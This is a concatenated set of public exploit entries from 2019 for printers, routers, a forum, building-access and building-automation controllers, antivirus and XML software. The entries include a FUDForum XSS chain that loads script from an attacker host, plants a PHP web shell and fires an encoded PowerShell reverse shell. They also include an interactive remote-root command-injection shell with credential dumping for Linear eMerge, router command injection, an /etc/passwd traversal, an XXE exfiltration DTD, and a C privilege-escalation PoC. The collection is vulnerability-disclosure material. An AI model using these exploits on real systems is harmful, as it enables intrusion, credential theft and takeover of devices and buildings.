# Exploit Title: Bematech Printer MP-4200 - Denial of Service
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A
DoS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
--------------------------------------------------------------------------------------------------------
XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
# Date: 2019-10-26
# Exploit Author: liquidsky (JMcPeters)
# Vulnerable Software: FUDForum 3.0.9
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
# Version: 3.0.9
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
# Tested On: Windows / mysql / apache
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
# CVE: CVE-2019-18873
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//
function patience()
{
var u=setTimeout("grabShell()",5000);
}
// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell()
{
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.send(null);
}
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
// Send the proper header information along with the request
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
var fileName = "liquidsky.php";
var url = "/fudforum/adm/admbrowse.php";
var ctype = "application/x-php";
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
var boundary = "-----------------------------9703186584101745941654835853";
var fileSize = fileData.length;
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
body += currentdir + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
body += token + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
body += "1" + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
body += fileName + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
body += "Upload File" + '\r\n';
body += "--" + boundary + "--";
xhr.send(body);
}
//Grab SQ token
var req = new XMLHttpRequest();
req.onreadystatechange=function()
{
if (req.readyState == 4 && req.status == 200) {
var htmlPage = req.responseXML; /* fetch html */
var SQ = htmlPage.getElementsByTagName("input")[0]
submitFormWithTokenJS(SQ.value);
}
}
req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();
patience();
# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-13
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7256
#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################
import requests
import time####
import sys#####
import os######
import re######
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '''
.....
.e$$$$$$$$$$$$$$e.
z$$ ^$$$$$$$$$$$$$$$$$.
.$$$* J$$$$$$$$$$$$$$$$$$$e
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
.$ $$$$$$$$$$$$$$$$***$$ .ee"
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -\e$$ 4$$$$. .ze$$$""""
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
z$$" $$ $$$$P*"" J$*$$c
$$" $$F .$$$ $$ ^$$
$$ *$$c.z$$$ $$ $$
$P $$$$$$$ 4$F 4$
dP *$$$" $$ '$r
.$ J$" $"
$ $P 4$
F $$ 4$
4$% 4$
$$ 4$
d$" $$
$P $$
$$ $$
4$% $$
$$ $$
d$ $$
$F "3
r=4e=" ... ..rf . ""%
$**$*"^""=..^4*=4=^"" ^"""
'''
print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
print '\x20\x20[-] by lqwrm (c) 2019'
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
sys.exit()
ipaddr = sys.argv[1]
creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
showme = requests.get('http://'+ipaddr+'/test.txt')
print showme.text
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
#time.sleep(1);
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!\n"
break
else: continue
except Exception:
break
sys.exit()
# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: Luis Stefan
# Vendor Homepage: https://www.technicolor.com/
# Software Link: N/A
# Version: TC7300.B0 - STFA.51.20
# Tested on: macOS Mojave and Catalina
# CVE :
#!/usr/bin/env python3
__author__ = "Luis Stefan"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "luis.ss@protonmail.com"
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""
from enum import IntEnum
from scapy.all import *
import codecs, threading, time
# Define your network interface
interface = 'en0'
# Insert your interface card mac address
mac = 'xx:xx:xx:xx:xx:xx'
broadcast = 'ff:ff:ff:ff:ff:ff'
mac_hxd = codecs.decode(mac.replace(':', ''),'hex')
class Bootp(IntEnum):
Discover = 1
Offer = 2
Request = 3
Decline = 4
Ack = 5
Nak = 6
Release = 7
def dhcp_discover():
disc_pkt = Ether(src=mac, dst=broadcast) / \
IP(src='0.0.0.0', dst='255.255.255.255') / \
UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
DHCP(options=[('message-type', 'discover'), 'end'])
sendp(disc_pkt, iface=interface)
def dhcp_request(pkt):
yraddr = pkt['BOOTP'].yraddr
# gwaddr == Gateway Ip Address
gwaddr = '192.168.0.1'
param_req_list = []
hostname = "<script>alert('XSS triggered')</script>"
req_pkt = Ether(src=mac, dst=broadcast) / \
IP(src='0.0.0.0', dst='255.255.255.255') / \
UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
('requested_addr', yraddr), ('hostname', hostname), 'end'])
sendp(req_pkt, iface=interface)
def dhcp(pkt):
print(pkt.display())
print("#############################################################")
if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
dhcp_request(pkt)
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
print("Server Acknowledged")
sys.exit(0)
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
print("Server Declined")
sys.exit(0)
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
print("Server Nak")
sys.exit(0)
def ver_dhcp():
print("Verifying DHCP port traffic..")
sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
sys.exit(0)
def main():
t1 = threading.Thread(target=ver_dhcp, args=())
t1.setDaemon = True
t1.start()
time.sleep(2)
dhcp_discover()
if __name__ == "__main__":
main()
# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
# Date: 2019-11-12
# Exploit Author: João Teles
# Vendor Homepage: https://www.technicolor.com/
# Version: TD5130v2
# Firmware Version: OI_Fw_V20
# CVE : CVE-2019-18396
---------------------------
POST /mnt_ping.cgi HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http:/HOST/mnt_ping.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Cookie: session=COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
isSubmit=1&addrType=3&pingAddr=;ls&send=Send
# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Riccardo Gasparini
# Vendor Homepage: https://www.fastweb.it/
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
# Version: 0.00.81
# Tested on: Linux
# CVE : N/A
import requests, json, time, sys
current_milli_time = lambda: int(round(time.time() * 1000))
password='XXXXXXXXXXXXXXX'
if password == 'XXXXXXXXXXXXXXX':
print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
sys.exit(-1)
#get XSRF-TOKEN
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Referer': 'http://192.168.1.254/tr069',
}
params = ()
response = requests.get('http://192.168.1.254', headers=headers)
#login request and get sessionKey
xsrfToken=response.cookies['XSRF-TOKEN']
cookies = {
'XSRF-TOKEN': xsrfToken,
}
headers = {
'Pragma': 'no-cache',
'X-XSRF-TOKEN': xsrfToken,
'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Accept': 'application/json, text/plain, */*',
'Referer': 'http://192.168.1.254/tr069',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Cache-Control': 'no-cache',
}
params = (
('_', str(current_milli_time())),
('cmd', '3'),
('nvget', 'login_confirm'),
('password', password),
('remember_me', '1'),
('sessionKey', 'NULL'),
('username', 'admin'),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
jsonResponse = json.loads(response.text)
sessionKey=jsonResponse["login_confirm"]["check_session"]
print("Executing command reboot\n")
#some commands as example are shown below in the mount parameter
params = (
('_', str(current_milli_time())),
('act','nvset'),
('service','usb_remove'),
#Code execution
#('mount','&ping -c 10 192.168.1.172&'),
#('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
('mount','&reboot&'),
('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(response.text)
#logout
params = (
('_', str(current_milli_time())),
('cmd', '5'),
('nvget', 'login_confirm'),
('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(json.dumps(json.loads(response.text), indent=2))
# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap
POC
---------
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
# Date: 2019-10-10
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://www.scanguard.com/
# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
# Version: 2020
# Tested on: Windows
# CVE : N/A
# Category: exploit
SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]
https://www.scanguard.com
[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
Complete Antivirus & Security Software
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
CVE-2019-18895
[Affected Product Code Base]
ScanGuard Antivirus - latest
[Affected Component]
Permissions on installation directory
[Attack Type]
Local
[Impact Code execution]
true
[Impact Escalation of Privileges]
true
[Impact Information Disclosure]
true
[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.
[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available
[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
privilege escalation via a Trojan horse executable file.
The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
This can allow low integrity malware the ability to replace ScanGuard executables.
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
Everyone:(OI)(CI)(ID)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"
/* ScanGuard EoP
PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
rename(TARGET, DISABLED_TARGET);
printf("[+] ScanGuard Antivirus EoP PoC\n");
Sleep(300);
printf("[+] Disabled ScanGuard.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
if(!PWNED){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(300);
CopyFile(fname, newLoc, FALSE);
printf("[+] Replaced legit ScanGuard...\n");
Sleep(300);
printf("[+] Done!\n");
Sleep(300);
MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
Sleep(2000);
exit(0);
}else{
if(FileExists("ScamGuard.lnk")){
system("DEL /f ScamGuard.lnk");
}
printf("[+] ScamGuard PWNED!!!");
printf("[+] By hyp3rlinx\n");
system("pause");
}
}
}
[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
####################
Local File Inclusion
####################
http://xyz.com/?op=page&tmpl=../../admin_settings
This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.
http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload
The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.
Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7
#PoC
1- python -m SimpleHTTPServer 8000
1.1- Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
1.2.- payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml
#PoC Visual
https://imgur.com/2H8DhL9
# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version:6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
# With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC00-U, PXC64-U, PXC128-U
# With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
# With activated web server
# All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
